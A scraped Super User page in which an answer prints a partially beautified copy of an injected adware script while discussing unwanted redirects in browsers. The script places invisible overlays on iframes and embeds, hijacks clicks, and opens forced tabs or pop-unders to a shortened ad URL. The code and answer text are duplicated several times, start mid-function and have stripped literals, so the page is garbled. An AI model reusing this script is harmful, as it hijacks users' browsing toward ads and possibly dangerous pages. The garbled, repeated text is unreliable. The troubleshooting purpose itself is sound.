document.body.appendChild(mtadDivElement)
}
}
}
} catch (e) {}
}
function bcStart() {
if (!startScript) {
startScript = !0;
PPcc = getCookieValue("PP_CL" + PPid) ? parseInt(getCookieValue("PP_CL" + PPid)) : 0;
while (PPcl.length > 0) {
PPac = PPnCL();
if (PPac > PPcc) {
break
}
}
;PPcl.length == 0 && PPac <= PPcc && (PPac = false);
if (PPdef(PPRet)) {
if (PPRet.length > 0) {
var _0x50e8x2f = "";
for (var _0x50e8x23 = 0; _0x50e8x23 < PPRet.length; _0x50e8x23++) {
_0x50e8x2f = _0x50e8x2f + "&" + PPRet[_0x50e8x23]
}
;urlOfDamnation = urlOfDamnation + _0x50e8x2f
}
}
;(PPcc == PPac - 1 && PPac) && (addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("iframe"),
addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("object"),
addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("embed"));
for (var _0x50e8x20 = PPbl, _0x50e8x21 = _0x50e8x20.length, _0x50e8x2a = 0; _0x50e8x2a < _0x50e8x21; _0x50e8x2a++) {
var _0x50e8x2c = document.getElementById(_0x50e8x20[_0x50e8x2a]);
null != _0x50e8x2c && (_0x50e8x2c.onmouseup = function(_0x50e8x18) {
_0x50e8x18 = _0x50e8x18 || window.event;
_0x50e8x18.stopPropagation ? _0x50e8x18.stopPropagation() : _0x50e8x18.cancelBubble = !0
}
)
}
;if (PPwl.length > 0) {
for (_0x50e8x23 = 0; _0x50e8x23 < PPwl.length; _0x50e8x23++) {
var _0x50e8x22 = document.getElementById(PPwl[_0x50e8x23]);
_0x50e8x22 != null && attachOpenNewTabOnClick(_0x50e8x22)
}
} else {
attachOpenNewTabOnClick(document)
}
}
}
var startTimeout = setTimeout(bcStart, 3000)
, startScript = null ;
if ("function" == typeof window.addEventListener) {
window.addEventListener("load", function() {
clearInterval(startTimeout);
bcStart()
}, !1)
} else {
try {
window.attachEvent("onload", function() {
clearInterval(startTimeout);
bcStart()
})
} catch (D) {}
}
document.getElementsByClassName = function(className) {
var matchingElements = ;
className = new RegExp("b" + className + "b");
for (var allDOMElements = this.getElementsByTagName("*"), index = 0; index < allDOMElements.length; index++) {
if (className.test(allDOMElements[index].className)) {
matchingElements.push(allDOMElements[index])
}
}
;return matchingElements
}
answered Oct 16 '16 at 17:43
Enoah NetzachEnoah Netzach
101
how can i block a request for a particular domain ? could you please elaborate this one ?
– Prateek Jain
Dec 25 '16 at 8:54
add a comment |
0
0
0
My quick patch to this problem was to block any DNS request to that domain.
This does not (probably) solve the problem at the root, but for now it seems to work.
Some things I've noticed are:
- it happens both on my computer and my phone, and on different networks,
- the malicious scripts are injected only in
httprequests, - they intercept any first click bubbling to the
<html>tag, - they seem to be injected through multiple sources (google tag manager, google tag services and platform.twitter.com, that I'm aware of).
The script by itself doesn't looks dangerous, it just makes you open a new page with ads and potentially dangerous clickbaits.
I've partially beautified it below:
var PPid = "p20161003pr";
var PPRet = ;
var userAgent = navigator.userAgent.toLowerCase();
var isOpera = -1 != userAgent.indexOf("opera");
var isChrome = -1 != userAgent.indexOf("chrome");
var PPdl = "3";
var PPbl = "";
var PPwl = "";
var PPmw = 450;
var urlOfDamnation = "https://goo.gl/Vjh91p";
var PPcl = [1].sort();
var PPcc = 0;
var PPac;
PPbl = PPbl == "" ? : PPbl.split(" ");
PPwl = PPwl == "" ? : PPwl.split(" ");
function PPdef(_0x50e8x14) {
return (typeof (_0x50e8x14) == "undefined") ? false : true
}
function chPrnt(_0x50e8x19, _0x50e8x14) {
var _0x50e8x17 = false;
if (_0x50e8x19 != null ) {
l = _0x50e8x14 == "w" ? PPwl : PPbl;
if (l.length > 0) {
for (var _0x50e8x18 = 0; _0x50e8x18 < l.length; _0x50e8x18++) {
if (_0x50e8x19.id == PPbl[_0x50e8x18]) {
_0x50e8x17 = true;
break
}
}
;delete l;
!_0x50e8x17 && (_0x50e8x17 = chPrnt(_0x50e8x19.parentNode, _0x50e8x14))
}
}
;return _0x50e8x17
}
function attachOpenNewTabOnClick() {
if (document.attachEvent) {
document.attachEvent("onclick", openNewTab)
} else {
if (document.addEventListener) {
document.addEventListener("click", openNewTab, false)
}
}
}
function PPnCL() {
return (PPcl.length > 0) ? PPcl.shift() : false
}
function setV(_0x50e8x20, _0x50e8x21) {
var _0x50e8x22 = PPdl
, _0x50e8x23 = new Date;
_0x50e8x23.setTime(_0x50e8x23.getTime())
}
function getCookieValue(cookieKey) {
var cookies = document.cookie;
cookieKey += "=";
var cookieStartIndex = cookies.indexOf("; " + cookieKey);
if (-1 == cookieStartIndex) {
cookieStartIndex = cookies.indexOf(cookieKey);
if (0 != cookieStartIndex) {
return null
}
} else {
cookieStartIndex += 2
}
var cookieEndIndex = cookies.indexOf(";", cookieStartIndex);
if (-1 == cookieEndIndex) {
(cookieEndIndex = cookies.length);
}
return unescape(cookies.substring(cookieStartIndex + cookieKey.length, cookieEndIndex))
}
function openNewTab() {
var _0x50e8x14 = getCookieValue("PP_CL" + PPid) ? parseInt(getCookieValue("PP_CL" + PPid)) : PPcc;
_0x50e8x14++;
PPac !== false && (setV("PP_CL" + PPid, _0x50e8x14));
if (!getCookieValue("PP_ID" + PPid + "." + PPac) && _0x50e8x14 == PPac) {
setV("PP_ID" + PPid + "." + PPac, 1);
if (document.createEvent && (isOpera || isChrome)) {
var _0x50e8x18 = document.createElement("a");
_0x50e8x18.href = urlOfDamnation;
_0x50e8x18.target = "_blank";
var _0x50e8x19 = document.createEvent("MouseEvents");
_0x50e8x19.initMouseEvent("click", !0, !0, window, 1, 0, 0, 0, 0, !0, !1, !1, !1, 1, null );
_0x50e8x18.dispatchEvent(_0x50e8x19)
} else {
_0x50e8x18 = window.open("about:blank", "win" + Math.floor(9999999 * Math.random()) + 1, "toolbar=0,scrollbars=1,location=1,statusbar=1,menubar=0,resizable=1,top=0,left=0,width=" + window.screen.width + "px,height=" + window.screen.height + "px");
with (_0x50e8x18) {
opener.window.focus(),
_0x50e8x18.location = urlOfDamnation,
"undefined" != typeof window.mozPaintCount && window.open("about:blank").close()
}
}
;for (var _0x50e8x18 = document.getElementsByClassName("mtaddiv"), _0x50e8x19 = _0x50e8x18.length, _0x50e8x17 = 0; _0x50e8x17 < _0x50e8x19; _0x50e8x17++) {
"object" == typeof _0x50e8x18[_0x50e8x17] && _0x50e8x18[_0x50e8x17].setAttribute("style", "position:none;left:0px;top:0px;height:0;width:0;z-index:0;display:none;")
}
;PPac = PPnCL()
}
;_0x50e8x14 == PPac - 1 && (addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("iframe"),
addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("object"),
addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("embed"));
PPcc = _0x50e8x14
}
function addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick(tagName) {
try {
if (!getCookieValue("PP_ID" + PPid + "." + PPac)) {
var elements = document.getElementsByTagName(tagName);
var elementsCount = elements.length;
for (var index = 0; index < elementsCount; index++) {
var elementOffsetWidth = elements[index].offsetWidth;
var elementOffsetHeight = elements[index].offsetHeight;
var check = true;
if (PPwl.length > 0 && !chPrnt(elements[index], "w")) {
check = false;
}
if (check && (PPbl.length > 0 && chPrnt(elements[index], "b"))) {
check = false;
}
if (elementOffsetWidth > PPmw && check) {
var mtadDivElement = document.createElement("div");
mtadDivElement.className = "mtaddiv";
var elementDimensions = elements[index].getBoundingClientRect();
var dimensions = {
top: Math.round(elementDimensions.top + (window.pageYOffset || (document.documentElement.scrollTop || document.body.scrollTop)) - (document.documentElement.clientTop || (document.body.clientTop || 0))),
left: Math.round(elementDimensions.left + (window.pageXOffset || (document.documentElement.scrollLeft || document.body.scrollLeft)) - (document.documentElement.clientLeft || (document.body.clientLeft || 0)))
};
mtadDivElement.setAttribute("style", "position: absolute;left:" + dimensions.left + "px;top:" + dimensions.top + "px;height:" + elementOffsetHeight + "px;width:" + elementOffsetWidth + "px;z-index:899");
if (PPwl.length > 0) {
attachOpenNewTabOnClick(mtadDivElement);
}
document.body.appendChild(mtadDivElement)
}
}
}
} catch (e) {}
}
function bcStart() {
if (!startScript) {
startScript = !0;
PPcc = getCookieValue("PP_CL" + PPid) ? parseInt(getCookieValue("PP_CL" + PPid)) : 0;
while (PPcl.length > 0) {
PPac = PPnCL();
if (PPac > PPcc) {
break
}
}
;PPcl.length == 0 && PPac <= PPcc && (PPac = false);
if (PPdef(PPRet)) {
if (PPRet.length > 0) {
var _0x50e8x2f = "";
for (var _0x50e8x23 = 0; _0x50e8x23 < PPRet.length; _0x50e8x23++) {
_0x50e8x2f = _0x50e8x2f + "&" + PPRet[_0x50e8x23]
}
;urlOfDamnation = urlOfDamnation + _0x50e8x2f
}
}
;(PPcc == PPac - 1 && PPac) && (addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("iframe"),
addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("object"),
addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("embed"));
for (var _0x50e8x20 = PPbl, _0x50e8x21 = _0x50e8x20.length, _0x50e8x2a = 0; _0x50e8x2a < _0x50e8x21; _0x50e8x2a++) {
var _0x50e8x2c = document.getElementById(_0x50e8x20[_0x50e8x2a]);
null != _0x50e8x2c && (_0x50e8x2c.onmouseup = function(_0x50e8x18) {
_0x50e8x18 = _0x50e8x18 || window.event;
_0x50e8x18.stopPropagation ? _0x50e8x18.stopPropagation() : _0x50e8x18.cancelBubble = !0
}
)
}
;if (PPwl.length > 0) {
for (_0x50e8x23 = 0; _0x50e8x23 < PPwl.length; _0x50e8x23++) {
var _0x50e8x22 = document.getElementById(PPwl[_0x50e8x23]);
_0x50e8x22 != null && attachOpenNewTabOnClick(_0x50e8x22)
}
} else {
attachOpenNewTabOnClick(document)
}
}
}
var startTimeout = setTimeout(bcStart, 3000)
, startScript = null ;
if ("function" == typeof window.addEventListener) {
window.addEventListener("load", function() {
clearInterval(startTimeout);
bcStart()
}, !1)
} else {
try {
window.attachEvent("onload", function() {
clearInterval(startTimeout);
bcStart()
})
} catch (D) {}
}
document.getElementsByClassName = function(className) {
var matchingElements = ;
className = new RegExp("b" + className + "b");
for (var allDOMElements = this.getElementsByTagName("*"), index = 0; index < allDOMElements.length; index++) {
if (className.test(allDOMElements[index].className)) {
matchingElements.push(allDOMElements[index])
}
}
;return matchingElements
}
answered Oct 16 '16 at 17:43
Enoah NetzachEnoah Netzach
101
My quick patch to this problem was to block any DNS request to that domain.
This does not (probably) solve the problem at the root, but for now it seems to work.
Some things I've noticed are:
- it happens both on my computer and my phone, and on different networks,
- the malicious scripts are injected only in
httprequests, - they intercept any first click bubbling to the
<html>tag, - they seem to be injected through multiple sources (google tag manager, google tag services and platform.twitter.com, that I'm aware of).
The script by itself doesn't looks dangerous, it just makes you open a new page with ads and potentially dangerous clickbaits.
I've partially beautified it below:
var PPid = "p20161003pr";
var PPRet = ;
var userAgent = navigator.userAgent.toLowerCase();
var isOpera = -1 != userAgent.indexOf("opera");
var isChrome = -1 != userAgent.indexOf("chrome");
var PPdl = "3";
var PPbl = "";
var PPwl = "";
var PPmw = 450;
var urlOfDamnation = "https://goo.gl/Vjh91p";
var PPcl = [1].sort();
var PPcc = 0;
var PPac;
PPbl = PPbl == "" ? : PPbl.split(" ");
PPwl = PPwl == "" ? : PPwl.split(" ");
function PPdef(_0x50e8x14) {
return (typeof (_0x50e8x14) == "undefined") ? false : true
}
function chPrnt(_0x50e8x19, _0x50e8x14) {
var _0x50e8x17 = false;
if (_0x50e8x19 != null ) {
l = _0x50e8x14 == "w" ? PPwl : PPbl;
if (l.length > 0) {
for (var _0x50e8x18 = 0; _0x50e8x18 < l.length; _0x50e8x18++) {
if (_0x50e8x19.id == PPbl[_0x50e8x18]) {
_0x50e8x17 = true;
break
}
}
;delete l;
!_0x50e8x17 && (_0x50e8x17 = chPrnt(_0x50e8x19.parentNode, _0x50e8x14))
}
}
;return _0x50e8x17
}
function attachOpenNewTabOnClick() {
if (document.attachEvent) {
document.attachEvent("onclick", openNewTab)
} else {
if (document.addEventListener) {
document.addEventListener("click", openNewTab, false)
}
}
}
function PPnCL() {
return (PPcl.length > 0) ? PPcl.shift() : false
}
function setV(_0x50e8x20, _0x50e8x21) {
var _0x50e8x22 = PPdl
, _0x50e8x23 = new Date;
_0x50e8x23.setTime(_0x50e8x23.getTime())
}
function getCookieValue(cookieKey) {
var cookies = document.cookie;
cookieKey += "=";
var cookieStartIndex = cookies.indexOf("; " + cookieKey);
if (-1 == cookieStartIndex) {
cookieStartIndex = cookies.indexOf(cookieKey);
if (0 != cookieStartIndex) {
return null
}
} else {
cookieStartIndex += 2
}
var cookieEndIndex = cookies.indexOf(";", cookieStartIndex);
if (-1 == cookieEndIndex) {
(cookieEndIndex = cookies.length);
}
return unescape(cookies.substring(cookieStartIndex + cookieKey.length, cookieEndIndex))
}
function openNewTab() {
var _0x50e8x14 = getCookieValue("PP_CL" + PPid) ? parseInt(getCookieValue("PP_CL" + PPid)) : PPcc;
_0x50e8x14++;
PPac !== false && (setV("PP_CL" + PPid, _0x50e8x14));
if (!getCookieValue("PP_ID" + PPid + "." + PPac) && _0x50e8x14 == PPac) {
setV("PP_ID" + PPid + "." + PPac, 1);
if (document.createEvent && (isOpera || isChrome)) {
var _0x50e8x18 = document.createElement("a");
_0x50e8x18.href = urlOfDamnation;
_0x50e8x18.target = "_blank";
var _0x50e8x19 = document.createEvent("MouseEvents");
_0x50e8x19.initMouseEvent("click", !0, !0, window, 1, 0, 0, 0, 0, !0, !1, !1, !1, 1, null );
_0x50e8x18.dispatchEvent(_0x50e8x19)
} else {
_0x50e8x18 = window.open("about:blank", "win" + Math.floor(9999999 * Math.random()) + 1, "toolbar=0,scrollbars=1,location=1,statusbar=1,menubar=0,resizable=1,top=0,left=0,width=" + window.screen.width + "px,height=" + window.screen.height + "px");
with (_0x50e8x18) {
opener.window.focus(),
_0x50e8x18.location = urlOfDamnation,
"undefined" != typeof window.mozPaintCount && window.open("about:blank").close()
}
}
;for (var _0x50e8x18 = document.getElementsByClassName("mtaddiv"), _0x50e8x19 = _0x50e8x18.length, _0x50e8x17 = 0; _0x50e8x17 < _0x50e8x19; _0x50e8x17++) {
"object" == typeof _0x50e8x18[_0x50e8x17] && _0x50e8x18[_0x50e8x17].setAttribute("style", "position:none;left:0px;top:0px;height:0;width:0;z-index:0;display:none;")
}
;PPac = PPnCL()
}
;_0x50e8x14 == PPac - 1 && (addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("iframe"),
addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("object"),
addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("embed"));
PPcc = _0x50e8x14
}
function addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick(tagName) {
try {
if (!getCookieValue("PP_ID" + PPid + "." + PPac)) {
var elements = document.getElementsByTagName(tagName);
var elementsCount = elements.length;
for (var index = 0; index < elementsCount; index++) {
var elementOffsetWidth = elements[index].offsetWidth;
var elementOffsetHeight = elements[index].offsetHeight;
var check = true;
if (PPwl.length > 0 && !chPrnt(elements[index], "w")) {
check = false;
}
if (check && (PPbl.length > 0 && chPrnt(elements[index], "b"))) {
check = false;
}
if (elementOffsetWidth > PPmw && check) {
var mtadDivElement = document.createElement("div");
mtadDivElement.className = "mtaddiv";
var elementDimensions = elements[index].getBoundingClientRect();
var dimensions = {
top: Math.round(elementDimensions.top + (window.pageYOffset || (document.documentElement.scrollTop || document.body.scrollTop)) - (document.documentElement.clientTop || (document.body.clientTop || 0))),
left: Math.round(elementDimensions.left + (window.pageXOffset || (document.documentElement.scrollLeft || document.body.scrollLeft)) - (document.documentElement.clientLeft || (document.body.clientLeft || 0)))
};
mtadDivElement.setAttribute("style", "position: absolute;left:" + dimensions.left + "px;top:" + dimensions.top + "px;height:" + elementOffsetHeight + "px;width:" + elementOffsetWidth + "px;z-index:899");
if (PPwl.length > 0) {
attachOpenNewTabOnClick(mtadDivElement);
}
document.body.appendChild(mtadDivElement)
}
}
}
} catch (e) {}
}
function bcStart() {
if (!startScript) {
startScript = !0;
PPcc = getCookieValue("PP_CL" + PPid) ? parseInt(getCookieValue("PP_CL" + PPid)) : 0;
while (PPcl.length > 0) {
PPac = PPnCL();
if (PPac > PPcc) {
break
}
}
;PPcl.length == 0 && PPac <= PPcc && (PPac = false);
if (PPdef(PPRet)) {
if (PPRet.length > 0) {
var _0x50e8x2f = "";
for (var _0x50e8x23 = 0; _0x50e8x23 < PPRet.length; _0x50e8x23++) {
_0x50e8x2f = _0x50e8x2f + "&" + PPRet[_0x50e8x23]
}
;urlOfDamnation = urlOfDamnation + _0x50e8x2f
}
}
;(PPcc == PPac - 1 && PPac) && (addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("iframe"),
addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("object"),
addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("embed"));
for (var _0x50e8x20 = PPbl, _0x50e8x21 = _0x50e8x20.length, _0x50e8x2a = 0; _0x50e8x2a < _0x50e8x21; _0x50e8x2a++) {
var _0x50e8x2c = document.getElementById(_0x50e8x20[_0x50e8x2a]);
null != _0x50e8x2c && (_0x50e8x2c.onmouseup = function(_0x50e8x18) {
_0x50e8x18 = _0x50e8x18 || window.event;
_0x50e8x18.stopPropagation ? _0x50e8x18.stopPropagation() : _0x50e8x18.cancelBubble = !0
}
)
}
;if (PPwl.length > 0) {
for (_0x50e8x23 = 0; _0x50e8x23 < PPwl.length; _0x50e8x23++) {
var _0x50e8x22 = document.getElementById(PPwl[_0x50e8x23]);
_0x50e8x22 != null && attachOpenNewTabOnClick(_0x50e8x22)
}
} else {
attachOpenNewTabOnClick(document)
}
}
}
var startTimeout = setTimeout(bcStart, 3000)
, startScript = null ;
if ("function" == typeof window.addEventListener) {
window.addEventListener("load", function() {
clearInterval(startTimeout);
bcStart()
}, !1)
} else {
try {
window.attachEvent("onload", function() {
clearInterval(startTimeout);
bcStart()
})
} catch (D) {}
}
document.getElementsByClassName = function(className) {
var matchingElements = ;
className = new RegExp("b" + className + "b");
for (var allDOMElements = this.getElementsByTagName("*"), index = 0; index < allDOMElements.length; index++) {
if (className.test(allDOMElements[index].className)) {
matchingElements.push(allDOMElements[index])
}
}
;return matchingElements
}
answered Oct 16 '16 at 17:43
Enoah NetzachEnoah Netzach
101
answered Oct 16 '16 at 17:43
Enoah NetzachEnoah Netzach
101
answered Oct 16 '16 at 17:43
Enoah NetzachEnoah Netzach
101
answered Oct 16 '16 at 17:43
Enoah NetzachEnoah Netzach
101
101
how can i block a request for a particular domain ? could you please elaborate this one ?
– Prateek Jain
Dec 25 '16 at 8:54
add a comment |
how can i block a request for a particular domain ? could you please elaborate this one ?
– Prateek Jain
Dec 25 '16 at 8:54
how can i block a request for a particular domain ? could you please elaborate this one ?
– Prateek Jain
Dec 25 '16 at 8:54
how can i block a request for a particular domain ? could you please elaborate this one ?
– Prateek Jain
Dec 25 '16 at 8:54
add a comment |
draft saved
draft discarded
Thanks for contributing an answer to Super User!
- Please be sure to answer the question. Provide details and share your research!
But avoid …
- Asking for help, clarification, or responding to other answers.
- Making statements based on opinion; back them up with references or personal experience.
To learn more, see our tips on writing great answers.
draft saved
draft discarded
Sign up or log in
StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
StackExchange.ready(
function () {
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fsuperuser.com%2fquestions%2f1118258%2fhow-to-get-rid-of-viruses-which-redirect-you-to-gocloudly-goac-on-os-x-and-maxo%23new-answer', 'question_page');
}
);
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
If two different browsers on two devices show this behavior, then I'd suspect your network/modem/router.
– Arjan
Aug 27 '16 at 14:49
@Arjan I changed my router about a week ago and as I remember these problems showed up in this period. Will try to test it. Thank you for your advice.
– mekated
Aug 27 '16 at 15:24
Check your DNS settings on your new router and look if there isn't a firmware upgrade for your router.
– Tonin
Sep 20 '16 at 10:45